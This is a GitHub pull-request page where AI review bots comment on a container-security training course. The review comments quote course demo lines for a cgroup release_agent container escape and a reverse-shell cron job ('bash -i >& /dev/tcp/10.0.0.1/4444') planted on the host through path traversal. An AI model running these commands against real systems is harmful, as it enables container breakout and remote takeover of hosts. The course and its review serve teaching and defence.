3. Broken/unclear sed extraction 🐞 Bug ≡ Correctness
Description
The cgroup release_agent demo uses sed -n 's/.*\perdir=... to derive host_path, which is
unclear (contains a \p escape) and does not explicitly match the intended overlay upperdir=
field. This can cause the demo commands to fail or extract the wrong path when learners follow the
scripts.
Code

container-security-course/module_02_privileged_containers/video_03_script.md[R58-60]

+# Get the container's overlay path on the host
+/ # host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
+/ # echo "$host_path/cmd" > /tmp/cgrp/release_agent
Evidence
Both Module 2 scripts use the same sed pattern (\perdir=) to extract the host overlay path for
the release_agent escape, making the copy/paste commands error-prone and potentially incorrect.

container-security-course/module_02_privileged_containers/video_03_script.md[53-61]
container-security-course/module_02_privileged_containers/video_02_script.md[225-236]

Agent prompt
The issue below was found during a code review. Follow the provided context and guidance below and implement a solution

## Issue description
In the cgroup `release_agent` escape steps, the script extracts `host_path` using:

`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`

This is unclear (contains `\p`) and doesn’t explicitly match the intended `upperdir=` overlay mount option, which is what the preceding comment says it is trying to extract.

## Issue Context
The same extraction appears in multiple Module 2 scripts in the `release_agent` sections.

## Fix Focus Areas
- container-security-course/module_02_privileged_containers/video_02_script.md[233-235]
- container-security-course/module_02_privileged_containers/video_03_script.md[53-61]

ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools


Grey Divider

Qodo Logo

Comment on lines +29 to +36
```
container_security_course/
├── README.md # This file
├── course_outline.md # Complete course structure
├── course_summary.pdf # 6-page course overview
├── course_summary.html # Source HTML for PDF
├── metadata_template.md # Video metadata standard
└── sample_module/ # Module 3: Seccomp Profiles

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Remediation recommended

1. Wrong directory name shown 🐞 Bug ≡ Correctness

container-security-course/README.md’s directory tree shows the root folder as
container_security_course/, but the actual folder name in this repo is
container-security-course/. This makes the documented directory layout incorrect for copy/paste
and navigation.
Agent Prompt
## Issue description
`container-security-course/README.md` documents the package root folder as `container_security_course/` (underscores), but the real folder in the repository is `container-security-course/` (hyphens). This makes the directory structure snippet wrong.

## Issue Context
The README is located under `container-security-course/`, so the tree should reflect that exact directory name.

## Fix Focus Areas
- container-security-course/README.md[27-41]

ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools

Comment on lines +1 to +16
# Container Security Course - Phase 1 Package
## Complete Course Development Deliverables

**Course Title:** Container Security: From Basics to Advanced Protection
**Duration:** 3.5-4 hours
**Level:** Intermediate
**Format:** Video-based with hands-on labs
**Phase:** 1 (Planning & Sample Module)
**Delivery Date:** July 5, 2026

---

## 📦 Package Contents

This Phase 1 package contains everything needed to evaluate, approve, and begin production of the complete container security course. All deliverables meet publisher technical requirements.

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Remediation recommended

2. Readme phase scope mismatch 🐞 Bug ⚙ Maintainability

container-security-course/README.md states the package is Phase 1 (planning + sample module), but
the repo content and deliverables summary indicate Phase 2 deliverables for Modules 1 & 2 are
included. This inconsistency can mislead reviewers/users about what content is actually present.
Agent Prompt
## Issue description
`container-security-course/README.md` describes the package as Phase 1 (planning + sample module), but the PR includes completed content for Modules 1 and 2 (and the deliverables summary calls it Phase 2). This mismatch can cause readers to overlook Modules 1 & 2 or misunderstand what the package contains.

## Issue Context
The repository now contains full Module 1 and Module 2 deliverables (metadata/scripts/questions), and `DELIVERABLES_SUMMARY.txt` describes them as Phase 2.

## Fix Focus Areas
- container-security-course/README.md[1-20]
- container-security-course/README.md[27-41]
- container-security-course/DELIVERABLES_SUMMARY.txt[1-12]

ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools

Comment on lines +58 to +60
# Get the container's overlay path on the host
/ # host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
/ # echo "$host_path/cmd" > /tmp/cgrp/release_agent

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Remediation recommended

3. Broken/unclear sed extraction 🐞 Bug ≡ Correctness

The cgroup release_agent demo uses sed -n 's/.*\perdir=... to derive host_path, which is
unclear (contains a \p escape) and does not explicitly match the intended overlay upperdir=
field. This can cause the demo commands to fail or extract the wrong path when learners follow the
scripts.
Agent Prompt
## Issue description
In the cgroup `release_agent` escape steps, the script extracts `host_path` using:

`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`

This is unclear (contains `\p`) and doesn’t explicitly match the intended `upperdir=` overlay mount option, which is what the preceding comment says it is trying to extract.

## Issue Context
The same extraction appears in multiple Module 2 scripts in the `release_agent` sections.

## Fix Focus Areas
- container-security-course/module_02_privileged_containers/video_02_script.md[233-235]
- container-security-course/module_02_privileged_containers/video_03_script.md[53-61]

ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools

Copilot AI left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull request overview

Adds substantial Container Security Course content under container-security-course/, including Phase/package documentation plus full written scripts/metadata/questions for Modules 1 & 2 and a Seccomp sample module (Module 3).

Changes:

  • Introduces the Phase/package README, course outline, and HTML source used to generate the course summary PDF.
  • Adds complete lesson scripts, assessment questions, and metadata for Module 1 (Fundamentals) and Module 2 (Privileged Containers & Attack Vectors).
  • Adds a Seccomp sample module (Module 3) with 3 full video scripts + module assessment questions.

Reviewed changes

Copilot reviewed 24 out of 67 changed files in this pull request and generated 20 comments.

Show a summary per file
File Description
container-security-course/README.md Package overview, directory structure, and deliverables checklist for Phase/package review.
container-security-course/course_outline.md Master outline describing modules, videos, labs, objectives, and delivery notes.
container-security-course/course_summary.html HTML source for rendering the course summary PDF and marketing preview.
container-security-course/metadata_template.md Standard metadata template + example for consistent video metadata across the course.
container-security-course/DELIVERABLES_SUMMARY.txt Consolidated “what’s included” summary for reviewers/producers.
container-security-course/sample_module/video_01_script.md Sample Seccomp module: intro script covering fundamentals and Docker default profile.
container-security-course/sample_module/video_02_script.md Sample Seccomp module: hands-on custom profile creation workflow using strace.
container-security-course/sample_module/video_03_script.md Sample Seccomp module: troubleshooting + production practices + Kubernetes integration.
container-security-course/sample_module/module_questions.md Sample Seccomp module assessments (module-level + final exam style questions).
container-security-course/module_01_fundamentals/module_summary_script.md Module 1 summary/orientation script.
container-security-course/module_01_fundamentals/video_01_script.md Module 1 lesson script: namespaces/cgroups/filesystem isolation deep dive.
container-security-course/module_01_fundamentals/video_02_script.md Module 1 lesson script: container vs VM security model comparison.
container-security-course/module_01_fundamentals/video_03_script.md Module 1 lesson script: shared kernel risk and mitigation overview.
container-security-course/module_01_fundamentals/video_04_script.md Module 1 lesson script: Docker daemon/socket security and hardening guidance.
container-security-course/module_01_fundamentals/video_05_script.md Module 1 lesson script: attack surface mapping and scanning demos.
container-security-course/module_01_fundamentals/questions.md Module 1 assessment questions (module + final assessment contributions).
container-security-course/module_01_fundamentals/metadata.md Module 1 per-video metadata for production/LMS integration.
container-security-course/module_02_privileged_containers/module_summary_script.md Module 2 summary/orientation script.
container-security-course/module_02_privileged_containers/video_01_script.md Module 2 lesson script: privileged containers—what they change and why dangerous.
container-security-course/module_02_privileged_containers/video_02_script.md Module 2 lesson script: privileged container host compromise walkthroughs.
container-security-course/module_02_privileged_containers/video_03_script.md Module 2 lesson script: escalation techniques from individual misconfigs/capabilities.
container-security-course/module_02_privileged_containers/video_04_script.md Module 2 lesson script: CVE analysis and exploitation chains across stack layers.
container-security-course/module_02_privileged_containers/questions.md Module 2 assessment questions (module + final assessment contributions).
container-security-course/module_02_privileged_containers/metadata.md Module 2 per-video metadata for production/LMS integration.

💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.

## 📁 Directory Structure

```
container_security_course/
**Purpose:** Complete blueprint for the 3.5-4 hour course

**Contents:**
- 6 modules with detailed learning objectives
Comment on lines +184 to +186
<span class="stat-number">6</span>
<span class="stat-label">Modules</span>
</div>
Comment on lines +2 to +4
CONTAINER SECURITY MASTERCLASS — DELIVERABLES SUMMARY
Phase 2: Modules 1 & 2 Complete Content
Generated: July 2026
Comment on lines +69 to +71
```bash
docker run --rm --name nginx-trace nginx:alpine /bin/sh -c "strace -c nginx -g 'daemon off;' 2>&1" | head -40
```
Comment on lines +204 to +206
# Write a cron job to the host's cron directory
/ # echo '* * * * * root bash -i >& /dev/tcp/10.0.0.1/4444 0>&1' \
> /app/logs/../cron.d/backdoor
/ # echo '* * * * * root bash -i >& /dev/tcp/10.0.0.1/4444 0>&1' \
> /app/logs/../cron.d/backdoor
```
*"Using path traversal relative to the mounted directory, I wrote a reverse shell cron job to the host's /var/cron.d/. This executes on the host every minute."*

**Visual Elements:**
- Cover page with branding
- Stats grid (6 modules, 20+ videos, 12 labs)

## ✅ Phase 1 Completion Checklist

- [x] Course outline with 6 modules and 20+ videos

**[TYPE:]**
```bash
grep -oP '^[^\(]+' nginx_strace_output.txt | sort -u > nginx_syscalls.txt
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants